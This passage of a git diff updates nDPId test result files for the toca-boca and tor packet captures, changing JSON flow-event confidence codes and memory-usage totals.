-00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1649959918209,"flow_last_seen":1649959918209,"flow_idle_time":200000,"flow_min_l4_payload_len":13,"flow_max_l4_payload_len":13,"flow_tot_l4_payload_len":13,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1650009948783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"91.199.81.208","src_port":45096,"dst_port":5055,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1649959918209,"flow_last_seen":1649959918209,"flow_idle_time":200000,"flow_min_l4_payload_len":13,"flow_max_l4_payload_len":13,"flow_tot_l4_payload_len":13,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1650009948783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"91.199.81.208","src_port":45096,"dst_port":5055,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} 00654{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1650009948783,"flow_last_seen":1650009948783,"flow_idle_time":200000,"flow_min_l4_payload_len":1200,"flow_max_l4_payload_len":1200,"flow_tot_l4_payload_len":1200,"flow_avg_l4_payload_len":1200,"midstream":0,"thread_ts_msec":1650009948783,"l3_proto":"ip4","src_ip":"91.199.81.225","dst_ip":"192.168.2.100","src_port":5055,"dst_port":43151,"l4_proto":"udp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} 
00593{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1650009948783,"flow_last_seen":1650009948783,"flow_idle_time":200000,"flow_min_l4_payload_len":1200,"flow_max_l4_payload_len":1200,"flow_tot_l4_payload_len":1200,"flow_avg_l4_payload_len":1200,"midstream":0,"thread_ts_msec":1650009948783,"l3_proto":"ip4","src_ip":"91.199.81.225","dst_ip":"192.168.2.100","src_port":5055,"dst_port":43151,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00563{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":77,"source":"toca-boca.pcap","alias":"nDPId-test","packets-captured":77,"packets-processed":77,"total-skipped-flows":0,"total-l4-payload-len":12337,"total-not-detected-flows":0,"total-guessed-flows":4,"total-detected-flows":17,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":21,"total-idle-flows":21,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":105,"global_ts_msec":1650009948783} @@ -111,9 +111,9 @@ ~~ total active/idle flows...: 21/21 ~~ total timeout flows.......: 3 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5892876 bytes -~~ total memory freed........: 5892876 bytes -~~ total allocations/frees...: 118271/118271 +~~ total memory allocated....: 6026510 bytes +~~ total memory freed........: 6026510 bytes +~~ total allocations/frees...: 121033/121033 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 461 chars ~~ json string max len.......: 2100 chars diff --git a/test/results/tor.pcap.out b/test/results/tor.pcap.out index ffb8242e3..a0cd17ae6 100644 --- a/test/results/tor.pcap.out +++ b/test/results/tor.pcap.out 
@@ -10,31 +10,31 @@ 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"tor.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1383821665420,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1383821665420,"pkt":"UlQA2EYhUlQAWul3CABFAAA0A15AAIAGe0DAqAH8W49d8semAbvp\/8nSAAAAAIACIABVtgAAAgQFtAEDAwgBAQQC"} 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"tor.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1383821665491,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1383821665491,"pkt":"UlQAWul3UlQA2EYhCABFAAA0AABAAC4G0J5bj13ywKgB\/AG7x6b4Wbj86f\/J04ASOQiLRwAAAgQFtAEBBAIBAwMH"} 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"tor.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1383821665491,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1383821665491,"pkt":"UlQA2EYhUlQAWul3CABFAAAoA19AAIAGe0vAqAH8W49d8semAbvp\/8nT+Fm4\/VAQAQAEIgAAAAAAAAAA"} -00941{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"tor.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1383821665420,"flow_last_seen":1383821665498,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1383821665498,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"91.143.93.242","src_port":51110,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": 
{"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"www.ct7ctrgb6cr7.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01153{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9,"source":"tor.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1383821665420,"flow_last_seen":1383821665606,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":748,"flow_tot_l4_payload_len":963,"flow_avg_l4_payload_len":160,"midstream":0,"thread_ts_msec":1383821665606,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"91.143.93.242","src_port":51110,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"www.ct7ctrgb6cr7.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"184d532a16876b78846ae6a03f654890","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"CN=www.xkgk7fdx362yyyxib.com","subjectDN":"CN=www.g6ghvisevf3ibuu5.net","fingerprint":"94:F9:FF:E2:7F:DB:1F:B8:19:65:20:6F:F6:DE:B6:A5:D5:AF:14:C7"}} 
+00941{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"tor.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1383821665420,"flow_last_seen":1383821665498,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1383821665498,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"91.143.93.242","src_port":51110,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"www.ct7ctrgb6cr7.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01153{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9,"source":"tor.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1383821665420,"flow_last_seen":1383821665606,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":748,"flow_tot_l4_payload_len":963,"flow_avg_l4_payload_len":160,"midstream":0,"thread_ts_msec":1383821665606,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"91.143.93.242","src_port":51110,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": 
{"version":"TLSv1","client_requested_server_name":"www.ct7ctrgb6cr7.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"184d532a16876b78846ae6a03f654890","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"CN=www.xkgk7fdx362yyyxib.com","subjectDN":"CN=www.g6ghvisevf3ibuu5.net","fingerprint":"94:F9:FF:E2:7F:DB:1F:B8:19:65:20:6F:F6:DE:B6:A5:D5:AF:14:C7"}} 00178{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":25,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383821666212} 00344{"packet_event_id":1,"packet_event_name":"packet","packet_id":25,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383821666164,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":26,"source":"tor.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383821666407,"flow_last_seen":1383821666407,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1383821666407,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"46.59.52.31","src_port":51111,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"tor.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1383821666407,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1383821666407,"pkt":"UlQA2EYhUlQAWul3CABFAAA0A2hAAIAG0l3AqAH8Ljs0H8enAbvpjJYYAAAAAIACIADhCQAAAgQFtAEDAwgBAQQC"} 
00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"tor.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1383821666480,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1383821666480,"pkt":"UlQAWul3UlQA2EYhCABFAAA0AABAACwGKcYuOzQfwKgB\/AG7x6cxNPZ86YyWGYASchBnNQAAAgQFtAEBBAIBAwMK"} 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"tor.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1383821666481,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1383821666481,"pkt":"UlQA2EYhUlQAWul3CABFAAAoA2lAAIAG0mjAqAH8Ljs0H8enAbvpjJYZMTT2fVAQAQAZGwAAAAAAAAAA"} -01188{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"tor.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1383821666407,"flow_last_seen":1383821666482,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1383821666482,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"46.59.52.31","src_port":51111,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"TLS.Tor","breed":"Potentially Dangerous","category":"VPN"},"tls": 
{"version":"TLSv1","client_requested_server_name":"www.e6r5p57kbafwrxj3plz.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01400{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":32,"source":"tor.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1383821666407,"flow_last_seen":1383821666558,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":749,"flow_tot_l4_payload_len":971,"flow_avg_l4_payload_len":161,"midstream":0,"thread_ts_msec":1383821666558,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"46.59.52.31","src_port":51111,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"TLS.Tor","breed":"Potentially Dangerous","category":"VPN"},"tls": {"version":"TLSv1","client_requested_server_name":"www.e6r5p57kbafwrxj3plz.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"184d532a16876b78846ae6a03f654890","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"CN=www.gmvuy6mtjbxevwo3w.com","subjectDN":"CN=www.bpcau5b3haif5els.net","fingerprint":"3A:B1:8A:6F:C3:F6:41:ED:77:D5:40:C3:85:79:8B:62:46:BC:65:9C"}} 
+01188{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"tor.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1383821666407,"flow_last_seen":1383821666482,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1383821666482,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"46.59.52.31","src_port":51111,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"TLS.Tor","breed":"Potentially Dangerous","category":"VPN"},"tls": {"version":"TLSv1","client_requested_server_name":"www.e6r5p57kbafwrxj3plz.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01400{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":32,"source":"tor.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1383821666407,"flow_last_seen":1383821666558,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":749,"flow_tot_l4_payload_len":971,"flow_avg_l4_payload_len":161,"midstream":0,"thread_ts_msec":1383821666558,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"46.59.52.31","src_port":51111,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": 
{"total":250,"client":125,"server":125}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"TLS.Tor","breed":"Potentially Dangerous","category":"VPN"},"tls": {"version":"TLSv1","client_requested_server_name":"www.e6r5p57kbafwrxj3plz.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"184d532a16876b78846ae6a03f654890","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"CN=www.gmvuy6mtjbxevwo3w.com","subjectDN":"CN=www.bpcau5b3haif5els.net","fingerprint":"3A:B1:8A:6F:C3:F6:41:ED:77:D5:40:C3:85:79:8B:62:46:BC:65:9C"}} 00178{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":55,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383821668212} 00344{"packet_event_id":1,"packet_event_name":"packet","packet_id":55,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383821668066,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":56,"source":"tor.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383821668403,"flow_last_seen":1383821668403,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1383821668403,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"38.229.70.53","src_port":51112,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"tor.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1383821668403,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1383821668403,"pkt":"UlQA2EYhUlQAWul3CABFAAA0A3VAAIAGx5DAqAH8JuVGNceoAbuUs9YxAAAAAIACIADrCAAAAgQFtAEDAwgBAQQC"} 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"tor.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1383821668547,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1383821668547,"pkt":"UlQAWul3UlQA2EYhCABFAAA0AABAADQGFwYm5UY1wKgB\/AG7x6iEDREglLPWMoASOQg8wAAAAgQFtAEBBAIBAwMK"} 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"tor.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1383821668548,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1383821668548,"pkt":"UlQA2EYhUlQAWul3CABFAAAoA3ZAAIAGx5vAqAH8JuVGNceoAbuUs9YyhA0RIVAQAQC1nQAAAAAAAAAA"} -01191{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":60,"source":"tor.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1383821668403,"flow_last_seen":1383821668548,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":224,"flow_tot_l4_payload_len":224,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1383821668548,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"38.229.70.53","src_port":51112,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or 
older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"TLS.Tor","breed":"Potentially Dangerous","category":"VPN"},"tls": {"version":"TLSv1","client_requested_server_name":"www.q4cyamnc6mtokjurvdclt.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01397{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":63,"source":"tor.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1383821668403,"flow_last_seen":1383821668700,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":929,"flow_tot_l4_payload_len":1153,"flow_avg_l4_payload_len":192,"midstream":0,"thread_ts_msec":1383821668700,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"38.229.70.53","src_port":51112,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"TLS.Tor","breed":"Potentially Dangerous","category":"VPN"},"tls": {"version":"TLSv1","client_requested_server_name":"www.q4cyamnc6mtokjurvdclt.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"e1691a31bfe345d2692da75636ddfb00","unsafe_cipher":0,"cipher":"TLS_DHE_RSA_WITH_AES_256_CBC_SHA","issuerDN":"CN=www.gg562izcxdvqdk.com","subjectDN":"CN=www.fcsyvnlemwxv5p.net","fingerprint":"C1:93:18:2C:A3:1D:AC:5F:C7:DE:17:8A:4E:B1:E8:13:BB:08:73:3A"}} 
+01191{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":60,"source":"tor.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1383821668403,"flow_last_seen":1383821668548,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":224,"flow_tot_l4_payload_len":224,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1383821668548,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"38.229.70.53","src_port":51112,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"TLS.Tor","breed":"Potentially Dangerous","category":"VPN"},"tls": {"version":"TLSv1","client_requested_server_name":"www.q4cyamnc6mtokjurvdclt.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01397{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":63,"source":"tor.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1383821668403,"flow_last_seen":1383821668700,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":929,"flow_tot_l4_payload_len":1153,"flow_avg_l4_payload_len":192,"midstream":0,"thread_ts_msec":1383821668700,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"38.229.70.53","src_port":51112,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": 
{"total":250,"client":125,"server":125}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"TLS.Tor","breed":"Potentially Dangerous","category":"VPN"},"tls": {"version":"TLSv1","client_requested_server_name":"www.q4cyamnc6mtokjurvdclt.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"e1691a31bfe345d2692da75636ddfb00","unsafe_cipher":0,"cipher":"TLS_DHE_RSA_WITH_AES_256_CBC_SHA","issuerDN":"CN=www.gg562izcxdvqdk.com","subjectDN":"CN=www.fcsyvnlemwxv5p.net","fingerprint":"C1:93:18:2C:A3:1D:AC:5F:C7:DE:17:8A:4E:B1:E8:13:BB:08:73:3A"}} 00178{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":80,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383821670213} 00344{"packet_event_id":1,"packet_event_name":"packet","packet_id":80,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383821669834,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00178{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":83,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383821672213} 00344{"packet_event_id":1,"packet_event_name":"packet","packet_id":83,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383821669834,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 
